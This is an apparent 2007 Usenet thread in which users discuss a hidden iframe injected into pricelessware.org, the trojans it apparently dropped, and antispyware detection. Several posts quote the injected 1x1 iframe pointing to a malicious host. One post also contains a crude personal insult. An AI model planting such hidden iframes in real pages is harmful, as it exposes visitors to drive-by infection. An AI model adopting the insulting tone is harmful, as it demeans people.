>>patched and I highly doubt that "hack" was using a zero day
>>exploit so it probably didn't hurt anyone.
>
> If you look at the cut/paste Susan posted of the website front
> page, it does show a very suspicious iframe in with a pointer to a
> website hosted in Malaysia. If you know about these things, you
> might like to comment...
I posted to your alert almost 2 days ago about what it was doing.
See: Message-ID: <Xns99DA727ECC...@216.196.97.136>
For my response to Susan in which I give a quick rundown (from
memory) what it was doing.
It is another poor Internet Explorer-only attempt at infecting
compromised boxes.
bluerhinoceros
>> Pricelessware.org?
>
> Even if the site was hacked and an iframe was added to a "evil" site, it
> does not automatically mean you will be infected. My guess is the majority
> of alt.comp.freeware people are fully patched and I highly doubt that
> "hack" was using a zero day exploit so it probably didn't hurt anyone.
I'm fully patched and it ran here, so if it was taking advantage of an
unpatched exploit, it was a recent one. The iframe bug shows the site it
calls, but not what the parameter passed triggers. Without AntiVir (and
maybe PrevX backing it up), it would have done its dirty deed.
Cheers.
bluerhinoceros
And that xstuff website was only recently registered on Sep 22. If the
pricelessware.org site was hacked and being played with (the page has
been changing), one of the legitimate maintainers may wish to clear up
any mystery about their intended purpose of that iframe. Then again,
they may not. :-)
Cheers.
Anonymous Sender
Are you too stupid to figure out the obvious on your own?
Don't bother. Rhetorical question.
>
hummingbird
On Wed, 31 Oct 2007 00:37:27 -0400 'Susan Bugher'
wrote this on alt.comp.freeware:
>Sometimes paranoid, I went to the web page Hummingbird posted:
>http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.html
>where they recommended I scan my computer with:
>Prevx Computer Security Investigator (CSI)
>http://pxnow.prevx.com/zeroL/PREVXCSIFREE.EXE
>1523 KB
>
>so I did. . . the results:
>
><q>
>Security Product AVG 7.5.485 Version 7.5.485
>Windows Windows XP Home Service Pack 2 (Build 2600) 32bit
>Scans 1 (First Scan: Oct 31 4:13 UCT Last Scan: Oct 31 4:17 UCT)
>Files Checked 2,780
>Bad Files 0
>Your Computer Status CLEAN
></q>
Yeah, I also got a clean bill from the scan but AFTER I'd cleaned
the trojan files off my system.
>> dunno what:
>>
>> <iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
>> width=1 height=1 frameborder=0>
>>
>> does but I don't think it's good.
>
>still dunno what that link does. . .
Well I wouldn't recommend surfing there, but one of the Anonymous
posters here says he found 66 something or others.
hummingbird
On Wed, 31 Oct 2007 11:14:33 -0500 '-Lost'
wrote this on alt.comp.freeware:
>Response from Susan Bugher <sebu...@yahoo.com>:
>
><snip>
>
>>> dunno what:
>>>
>>> <iframe
>>> src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
>>> width=1 height=1 frameborder=0>
>>>
>>> does but I don't think it's good.
>>
>> still dunno what that link does. . .
>I do not believe that was the exact link when I visited, but it was
>the xstuff.biz site (I believe the ?out=nnnn was different). Anyway,
>it loads up some encoded JavaScript, the JavaScript attempts a few
>other things, tries to load Java applets from the "golom" site, and
>eventually if that fails or not it redirects you to Google.
Thanks for that info. How come you risked going there at all?
>I initially thought it redirected if it could not infect, but I
>forgot to disable one of my security measures. It redirects upon
>infection or not.
>
>It weakly tries to infect your system. Only Internet Explorer is
>currently susceptible and only in the least secure of environments.
That figures - I use a old ver of Avant which uses the IE engine.
>Also, that link is currently dead...
That appears to confirm what bluerhino found.
hummingbird
On Wed, 31 Oct 2007 11:28:24 -0500 '-Lost'
wrote this on alt.comp.freeware:
>Response from hummingbird <hummi...@2die4.com>:
>
>>>> Has anyone actually experienced any problems relating to
>>>> Pricelessware.org?
>>>
>>>Even if the site was hacked and an iframe was added to a "evil"
>>>site, it does not automatically mean you will be infected. My
>>>guess is the majority of alt.comp.freeware people are fully
>>>patched and I highly doubt that "hack" was using a zero day
>>>exploit so it probably didn't hurt anyone.
>> If you look at the cut/paste Susan posted of the website front
>> page, it does show a very suspicious iframe in with a pointer to a
>> website hosted in Malaysia. If you know about these things, you
>> might like to comment...
>I posted to your alert almost 2 days ago about what it was doing.
>
>See: Message-ID: <Xns99DA727ECC...@216.196.97.136>
That MID was posted today.
>For my response to Susan in which I give a quick rundown (from
>memory) what it was doing.
>
>It is another poor Internet Explorer-only attempt at infecting
>compromised boxes.
Thanks, I've just read that. I'm interested in why you bravely went
to that site to investigate it!
I'd be interested to know the details of what they've done and how
someone was able to hack into the pricelessware site. I know my
ISP's webmail got hacked into in May but I assume that was through
the logon screen.
hummingbird
On Wed, 31 Oct 2007 09:39:46 -0700 'bluerhinoceros'
wrote this on alt.comp.freeware:
>hummingbird wrote:
>> On Wed, 31 Oct 2007 13:21:09 +0000 (UTC) 'Aaron'
>> wrote this on alt.comp.freeware:
>>
>>> hm...@yhmmm.org wrote in
>>> news:ItidnfIfsM18lLXa...@giganews.com:
>>>
>>>
>>>> Has anyone actually experienced any problems relating to
>>>> Pricelessware.org?
>>> Even if the site was hacked and an iframe was added to a "evil" site, it
>>> does not automatically mean you will be infected. My guess is the majority
>>> of alt.comp.freeware people are fully patched and I highly doubt that
>>> "hack" was using a zero day exploit so it probably didn't hurt anyone.
>>
>> If you look at the cut/paste Susan posted of the website front page,
>> it does show a very suspicious iframe in with a pointer to a website
>> hosted in Malaysia. If you know about these things, you might like
>> to comment...
>>
>
>And that xstuff website was only recently registered on Sep 22.
Yeah I had noticed that.
>If the
>pricelessware.org site was hacked and being played with (the page has
>been changing), one of the legitimate maintainers may wish to clear up
>any mystery about their intended purpose of that iframe. Then again,
>they may not. :-)
Absolutely. I sent an e-mail to pricelessware's hosting company
yesterday morning to alert them but have received no reply. I'm no
expert on such matters but I don't understand how that site could
actually be hacked into - I mean it doesn't have a logon screen like
my ISP's webmail had when it was hacked into last May by Ruskies.
That hack operated in a similar way - it downloaded trojans onto
peoples' systems and turned them into spam bots.
So it raises some worrying questions...
bealoid
news:Xns99DAD92DD6D7...@85.214.62.108:
> My guess is the
> majority of alt.comp.freeware people are fully patched
Risky guess when you look at the numbers of people here using windows 98 or
windows ME.
bealoid
> Nomen Nescio <nob...@dizum.com> wrote in
> news:b659f56ea6a54777...@dizum.com:
>
>> Yes, dimbulb, that's exactly what I said.
>
> Why are you using an anonymous remailer based in Italy to post to this
> group? Something to hide?
Why are you using a news provider that hides your IP, and not using a valid
email address, to post to this group? Something to hide?
Anonymous
> Nomen Nescio <nob...@dizum.com> wrote in
> news:b659f56ea6a54777...@dizum.com:
>
> > Yes, dimbulb, that's exactly what I said.
>
> Why are you using an anonymous remailer based in Italy to post to
> this group? Something to hide?
*yawn*
None of your business.
>
hummingbird
On Wed, 31 Oct 2007 17:19:02 +0000 (UTC) 'Anonymous Sender'
wrote this on alt.comp.freeware:
>hummingbird wrote:
>
>>
>> On Wed, 31 Oct 2007 08:05:22 +0100 (CET) 'Anonymous'
>> wrote this on alt.comp.freeware:
>>
>> >hummingbird wrote:
>> >
>> >>
>> >> On Tue, 30 Oct 2007 15:59:45 -0700 'bluerhinoceros'
>> >> wrote this on alt.comp.freeware:
>> >>
>> >>
>> >> >Hi hmmm:
>> >> >
>> >> >I'm using Avira Antivir Personal Edition Classic. I also use Prevx
>> >> >2.0, but it didn't notice anything, presumably because AntiVir was
>> >> >earlier in the food chain.
>> >> >
>> >> >I then used Avira to scan the whole drive, followed by a reboot,
>> >> >another sweep and a going over with Prevx, Spybot and AdAware for
>> >> >good measure.
>> >>
>> >> See my comments about Spybot and AdAware. Neither picked up the
>> >> trojan files on my HDD.
>> >
>> >Neither one of them SHOULD.
>>
>> Are you going to say why?
>
>Are you too stupid to figure out the obvious on your own?
I'll take that as a No, you don't know.
>Don't bother. Rhetorical question.
I've noticed you posting a lot of rhetoric.
hummingbird
On Wed, 31 Oct 2007 00:37:27 -0400 'Susan Bugher'
wrote this on alt.comp.freeware:
>--
>Posted to alt.comp.freeware
>Search alt.comp.freeware (or read it online):
>http://www.google.com/advanced_group_search?q=+group:alt.comp.freeware
>Pricelessware & ACF: http://www.pricelesswarehome.org
>Pricelessware: http://www...pricelessware...org (not maintained)
Your sig is still advertising the OLD pricelessware site Susan...!
Franklin
wrote:
>
> On Wed, 31 Oct 2007 17:19:02 +0000 (UTC) 'Anonymous Sender'
> wrote this on alt.comp.freeware:
>
>>hummingbird wrote:
>>
>>>
>>> On Wed, 31 Oct 2007 08:05:22 +0100 (CET) 'Anonymous'
>>> wrote this on alt.comp.freeware:
>>>
>>> >hummingbird wrote:
>>> >
>>> >>
>>> >> On Tue, 30 Oct 2007 15:59:45 -0700 'bluerhinoceros'
>>> >> wrote this on alt.comp.freeware:
>>> >>
>>> >>
>>> >> >Hi hmmm:
>>> >> >
>>> >> >I'm using Avira Antivir Personal Edition Classic. I also use
>>> >> >Prevx 2.0, but it didn't notice anything, presumably because
>>> >> >AntiVir was earlier in the food chain.
>>> >> >
>>> >> >I then used Avira to scan the whole drive, followed by a
>>> >> >reboot, another sweep and a going over with Prevx, Spybot and
>>> >> >AdAware for good measure.
>>> >>
>>> >> See my comments about Spybot and AdAware. Neither picked up
>>> >> the trojan files on my HDD.
>>> >
>>> >Neither one of them SHOULD.
>>>
>>> Are you going to say why?
>>
>>Are you too stupid to figure out the obvious on your own?
>
> I'll take that as a No, you don't know.
>
>
>>Don't bother. Rhetorical question.
>
> I've noticed you posting a lot of rhetoric.
>
No one posts more windy rhetoric than you, Hummingbird.
Franklin
wrote:
You've been foolish by having no defense. Now you bleat open mouthed
that such a terrible thing has happend to you.
It's no big deal. If you had set your security properly then the
changes to pricelessware.org do no harm. I and, I'm sure, many
others browsed the bad page without changing any settings.
Similarly, you probably take no precautions when having sex in
Thailand. Can you spell AIDS?
-Lost
>>I do not believe that was the exact link when I visited, but it
>>was the xstuff.biz site (I believe the ?out=nnnn was different).
>>Anyway, it loads up some encoded JavaScript, the JavaScript
>>attempts a few other things, tries to load Java applets from the
>>"golom" site, and eventually if that fails or not it redirects you
>>to Google.
>
> Thanks for that info. How come you risked going there at all?
The truth? I am a hardheaded code sniffer.
Or an odd term that I heard a random hacker say once, "I wanna' know
why so I can deny." Of course they were not referring to liability
only malicious code.
-Lost
>>> See my comments about Spybot and AdAware. Neither picked up the
>>> trojan files on my HDD.
>>
>>Neither one of them SHOULD.
>
> Are you going to say why?
Technically speaking an "adware" or "spyware" program should not be
searching for viruses, trojans, backdoors, et cetera.
However, the terms in general have become somewhat ambiguous in the
industry that deals with them vendor-wise, so more and more adware
and spyware cleaning vendors have resorted to detecting and cleaning
more than just adware and spyware.
Same with firewalls doing more than blocking inbound/outbound access.
So your confusion is notably understood.
Jeez, did I say adware and spyware enough times?
-Lost
>>I posted to your alert almost 2 days ago about what it was doing.
My response about your ALERT thread.
>>See: Message-ID: <Xns99DA727ECC...@216.196.97.136>
>
> That MID was posted today.
>
>>For my response to Susan in which I give a quick rundown (from
>>memory) what it was doing.
Above and below your current response is my response about the post I
issued to Susan of which I gave you the Message-ID.
(You jumped the gun on responding evidently.)
>>It is another poor Internet Explorer-only attempt at infecting
>>compromised boxes.
>
> Thanks, I've just read that. I'm interested in why you bravely went
> to that site to investigate it!
I said it already in another post, but being the mostly friendly
humanoid that I am I will repeat a little.
I am hardheaded. I like to see if my security measures are decent,
and if I do get infected I like being able to get out of it
relatively easy. When I cannot reverse the changes easily enough it
is time to revamp security.
> I'd be interested to know the details of what they've done and how
> someone was able to hack into the pricelessware site. I know my
> ISP's webmail got hacked into in May but I assume that was through
> the logon screen.
JavaScript, Java, ActiveX, unsigned controls that only Internet
Explorer might be susceptible to, redirects to more code and some
other junk... I have the original 1st redirect code, but it wasn't
impressive from what I remember. So I didn't dig further.
And there are at least a million ways someone could have hacked into
the site. The site owner could be using content publishing or
blogging software that had a security hole, the web cracker could
have scanned the server software and saw a possibly unpatched system
and tried the known exploits, they could have used a simple
dictionary attack (highly unlikely but not at all impossible), and
there are just too many others to mention.
I am still amazed to this day when I can log on to a commercial or
personal workstation and use a simple password to get in. Or how
many dish their passwords out without me even asking. I forget where
I read somewhere (I forget where but I am sure it could be found
easily enough) that the most commonly used password still in use
today is "admin."
Anyway, this topic is off-topic enough. I think...
hummingbird
On Thu, 01 Nov 2007 01:44:43 -0500 '-Lost'
wrote this on alt.comp.freeware:
>Response from hummingbird <hummi...@2die4.com>:
>
>>>> See my comments about Spybot and AdAware. Neither picked up the
>>>> trojan files on my HDD.
>>>
>>>Neither one of them SHOULD.
>>
>> Are you going to say why?
>
>Technically speaking an "adware" or "spyware" program should not be
>searching for viruses, trojans, backdoors, et cetera.
>
>However, the terms in general have become somewhat ambiguous in the
>industry that deals with them vendor-wise, so more and more adware
>and spyware cleaning vendors have resorted to detecting and cleaning
>more than just adware and spyware.
>
>Same with firewalls doing more than blocking inbound/outbound access.
>So your confusion is notably understood.
>
>Jeez, did I say adware and spyware enough times?
Yeah OK but a major part of SpyBot S&D today is devoted to checking
for trojans, viruses, browser hijackers, keyloggers etc etc, so one
can safely assume that the product name doesn't reflect its intended
role. That it didn't pick up one of those 8 files on my HDD is
worrying given that so many people think it's the bees knees.
W/r/t/ AdAware, I didn't really expect it to check/find those items
but it did find the regkey.
hummingbird
On Thu, 01 Nov 2007 01:55:42 -0500 '-Lost'
wrote this on alt.comp.freeware:
>I am hardheaded. I like to see if my security measures are decent,
>and if I do get infected I like being able to get out of it
>relatively easy. When I cannot reverse the changes easily enough it
>is time to revamp security.
sounds reasonable.
>> I'd be interested to know the details of what they've done and how
>> someone was able to hack into the pricelessware site. I know my
>> ISP's webmail got hacked into in May but I assume that was through
>> the logon screen.
>
>JavaScript, Java, ActiveX, unsigned controls that only Internet
>Explorer might be susceptible to, redirects to more code and some
>other junk... I have the original 1st redirect code, but it wasn't
>impressive from what I remember. So I didn't dig further.
>
>And there are at least a million ways someone could have hacked into
>the site. The site owner could be using content publishing or
>blogging software that had a security hole, the web cracker could
>have scanned the server software and saw a possibly unpatched system
>and tried the known exploits, they could have used a simple
>dictionary attack (highly unlikely but not at all impossible), and
>there are just too many others to mention.
Interesting, thanks.
>I am still amazed to this day when I can log on to a commercial or
>personal workstation and use a simple password to get in. Or how
>many dish their passwords out without me even asking. I forget where
>I read somewhere (I forget where but I am sure it could be found
>easily enough) that the most commonly used password still in use
>today is "admin."
I run my own SMTP mail server and several weeks ago, a Chinese
IP address tried a brute force attack to get in ... 200+ attempts
in 20 mins. I sent an abuse report and the log to the ISP...
Franklin
wrote:
> Response from hummingbird <hummi...@2die4.com>:
>
>>>> See my comments about Spybot and AdAware. Neither picked up the
>>>> trojan files on my HDD.
>>>
>>>Neither one of them SHOULD.
>>
>> Are you going to say why?
>
> Technically speaking an "adware" or "spyware" program should not be
> searching for viruses, trojans, backdoors, et cetera.
>
> However, the terms in general have become somewhat ambiguous in the
> industry that deals with them vendor-wise, so more and more adware
> and spyware cleaning vendors have resorted to detecting and
> cleaning more than just adware and spyware.
>
> Same with firewalls doing more than blocking inbound/outbound
> access. So your confusion is notably understood.
>
> Jeez, did I say adware and spyware enough times?
>
Hello -Lost
Of course you're right but don't expect Hummingbird to accept the truth
of the matter without further quibbling and point scoring.
Adware/spyware is a fairly well defined group. What has changed lately
are the methods used by some adware is to behave more like trojans,
self-replicating software, hidden software, hard to remove components,
etc etc.
Nowadays adware detectors have to detect these extra methods and this
seems to have encouraged the adware detectors to include some
fingerprints for malware like trojans and viruses.
As we know, most adware detectors do this only as a "fringe" service to
their main purpose and they can hardly be relied upon to find malware.
It must be hard for n00bs to properly protect themselves when these
adware detectors claim to do so many things.
Software personal firewalls are another category where this function
creep has been happening. Whether you approve or disapprove of a SPF
(and that is a whole separate debate) it's clear that a SPF is extending
its function when it tries to detect all malware entering via SMPT. It
may be nice to have this but it's not really a solid replacement for
software which provides through AV protection.
----
Some people like to have layered defenses and if they get this extra
half-thorough function for free then it could be seen as an extra layer.
As before, one big problem is when a n00b thinks his SPF will actually
protect him against all malicious email attachments and do it as well as
a full-spec AV utility.
It must be better to use best-of-class apps for protection than rely on
some add-on features to an app which comes from a different class.
Franklin
nskre...@yahoo.com
> On Wed, 31 Oct 2007 15:06:34 +0000 'Cheemag'
> wrote this on alt.comp.freeware:
>
> >wrote:
>
> >>Also yesterday,SUPERantispywarelatest sigfile picked up 4 of the 8
> >>files as trojans.
>
> > How do you manage to make an anti-spyware application
> >find trojans?
>
> Good point. I dunno. I give up. What SAS actually found were 4 of
> the files which it said were fake 'svchost' files. In fact there was
> only one of them (filename: _svchost.exe) and the other 3 were
> obviously related to it. But it missed the other 4 files.
> (of course I'd already identified and disabled all of them myself)
>
> btw - my use of the term trojan in these threads is taken from
> the link I posted which calls this crapware: Trojan.SystemPoser.
>
> My hunch is that it tries to install a keylogger onto your system
> and sends data and browser images back to its mothership ...
> presumably with your bank/credit card details etc .. but I have
> no conclusive evidence of that.
>
> --
> uh oh...black helicopter ... gotta run
Can you send any files SUPERAntiSpyware missed to samples AT
superantispyware.com? I will update our definitions to detect/remove
them as necessary.
bluerhinoceros
>> I'm fully patched and it ran here,
>
> Actually from your description, it didn't actually run, but rather your
> security detected something..Not quite the same as you know.
Depends on whether the OP was meaning the initial execution was as a
result of an exploit, which is what I was replying to. However, it is a
distinction worth making, and point taken.
> The iframe bug shows the site
>> it calls, but not what the parameter passed triggers. Without AntiVir
>> (and maybe PrevX backing it up), it would have done its dirty deed.
>>
>
> Actually you can only be sure of that if you go there without them and
> get infected. Did you?
Well, maybe. :-)
When Avira detected a file, I nuked the current activities and did a
series of complete system scans. In addition to the quarantined file,
another was found in (I believe) a Java cache folder. So if the file
getting through to the hard disk qualifies as infected, then yes.
Cheers.
hummingbird
On Thu, 01 Nov 2007 15:07:32 -0700 'nskre...@yahoo.com'
wrote this on alt.comp.freeware:
>On Oct 31, 8:46 am, hummingbird <hummingb...@2die4.com> wrote:
>> Good point. I dunno. I give up. What SAS actually found were 4 of
>> the files which it said were fake 'svchost' files. In fact there was
>> only one of them (filename: _svchost.exe) and the other 3 were
>> obviously related to it. But it missed the other 4 files.
>> (of course I'd already identified and disabled all of them myself)
>>
>> btw - my use of the term trojan in these threads is taken from
>> the link I posted which calls this crapware: Trojan.SystemPoser.
>>
>> My hunch is that it tries to install a keylogger onto your system
>> and sends data and browser images back to its mothership ...
>> presumably with your bank/credit card details etc .. but I have
>> no conclusive evidence of that.
>Can you send any files SUPERAntiSpyware missed to samples AT
>superantispyware.com? I will update our definitions to detect/remove
>them as necessary.
I'll be happy to do that if you can tell me how to wrap them up.
Would a standard zipfile be ok? ... and should I address it to a
particular person?
bluerhinoceros
> When I finished my last system reinstallation (I usually reinstall every 18
> months or so), I didn't load Sun Java. My experience has been that most of
> the trojan alerts or infections found during a bootscan were usually in the
> Sun Java cache or some other script file. So far, I haven't missed Sun
> Java, but if someone can tell me how it greatly enhances my net experience,
> I might reinstall it.
I hear you. Unfortunately, I need Java for some key business
functionality, or I'd nuke it too. I'm not a fan.
Cheers.
hummingbird
On Thu, 01 Nov 2007 19:07:38 -0500 'hm...@hmmm.org'
wrote this on alt.comp.freeware:
>hummingbird <hummi...@2die4.com> wrote in
>news:862ba8504f7b978b...@localhost.127.0.0.1:
>
>> W/r/t/ AdAware, I didn't really expect it to check/find those items
>> but it did find the regkey.
>
>Which version of Ad-Aware, the new or the old.
>I still have the old freeware version loaded, as many say the new one is
>bloated. Do they both install the same definition files?
I'm still using the old one too but have tried to update the sig
files twice in recent days without success. Again just now.....
guess I'll have to go to the website and download manually.
hummingbird
On Thu, 01 Nov 2007 21:19:10 -0500 'hm...@hmmm.org'
wrote this on alt.comp.freeware:
>hummingbird <hummi...@2die4.com> wrote in
>news:62154e0f99b789f2...@localhost.127.0.0.1:
>
>> I'm still using the old one too but have tried to update the sig
>> files twice in recent days without success. Again just now.....
>> guess I'll have to go to the website and download manually.
>
>also using v 1.06r1 and was just able to update automatically to 29.10.2007
>definition file.
That's weird - I keep getting an error when it tries to download.
I'll keep trying - thanks for letting me know that it does actually
work, I thought maybe they'd cut access for the old free version
to force us onto the new one.
-Lost
Ditto. I have a few Java applications that I rely on -- otherwise I
have Java disabled at every turn.
Admittedly though it is a key device for Web chat, rough animation,
or games for those who do not wish to deal with Flash. Which is the
lesser of two evils I've no idea.
bluerhinoceros
>> When Avira detected a file, I nuked the current activities and did a
>> series of complete system scans. In addition to the quarantined file,
>> another was found in (I believe) a Java cache folder. So if the file
>> getting through to the hard disk qualifies as infected, then yes.
>
> False again. Shows you are still missing the point.
What part of "if" didn't you understand?
hummingbird
>On Oct 31, 8:46 am, hummingbird <hummingb...@2die4.com> wrote:
>> Good point. I dunno. I give up. What SAS actually found were 4 of
>> the files which it said were fake 'svchost' files. In fact there was
>> only one of them (filename: _svchost.exe) and the other 3 were
>> obviously related to it. But it missed the other 4 files.
>> (of course I'd already identified and disabled all of them myself)
>>
>> btw - my use of the term trojan in these threads is taken from
>> the link I posted which calls this crapware: Trojan.SystemPoser.
>>
>> My hunch is that it tries to install a keylogger onto your system
>> and sends data and browser images back to its mothership ...
>> presumably with your bank/credit card details etc .. but I have
>> no conclusive evidence of that.
>Can you send any files SUPERAntiSpyware missed to samples AT
>superantispyware.com? I will update our definitions to detect/remove
>them as necessary.
ok I sent them off this morning to the address you asked...
bluerhinoceros
> And I'm telling you running a java applet does not qualify as being
> infected. Not unless the applet manages to do something it was not supposed
> to do.
OK, this I hear. But where's that "not supposed to do" line? If the
applet managed to write other malicious files to the hard drive, could
that not be as a result of doing something it wasn't supposed to do?
> You are trying to backtrack from your earlier comments that you were
> infected if not for the protection of your AV, and I'm telling you this was
> not the case.
I'm actually trying understand. My original quote was "I'm fully patched
and it ran here, so if it was taking advantage of an unpatched exploit,
it was a recent one. The iframe bug shows the site it calls, but not
what the parameter passed triggers. Without AntiVir (and maybe PrevX
backing it up), it would have done its dirty deed."
I agree I would probably have been better advised to have used
"SOMETHING ran here" rather than "IT ran here", and "may have done"
rather than "would have done", but as we don't know "what the parameter
passed triggers", we don't know that it was only a java app being
executed/dropped/called by that script.
And in reply to your question about whether I was infected, I did say
"maybe" and "if the file getting through... qualifies...". I still don't
see any reason to "backtrack" from that statement, I see it as a
legitimate uncertainty. The file (detected by a later file scan, but not
when it was created) could have landed there by the action of a process
that was taking advantage of a unpatched vulnerabilty, couldn't it,
javascript initiated or not? This is normally the realm of a (trojan)
dropper, but is it not possible as the result of an exploit?
In short, let me be clear, then, that if my earlier posts conveyed a
definite assertion that "I was infected if not for the protection of
(my) AV", I humbly recant those statements, and would like to move on.
If I sound confused, it's because I am. Any assistance in clarifying
these muddy matters is welcome.
I appreciate your reasoned discourse rather than inflammatory language.
Cheers.